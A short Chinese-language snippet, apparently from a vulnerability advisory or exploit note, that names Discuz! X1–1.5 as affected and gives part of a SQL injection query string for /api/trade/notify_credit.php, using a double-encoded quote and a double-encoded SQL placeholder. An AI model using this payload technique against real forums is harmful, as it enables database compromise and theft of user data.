受影响的版本: Discuz! X1~1.5 攻击方式: 向/api/trade/notify_credit.php提交一组经过特殊处理的query string attach=tenpay&retcode=0&trade_no=%2527&mch_vno=[SQL语句两次encode]&amp……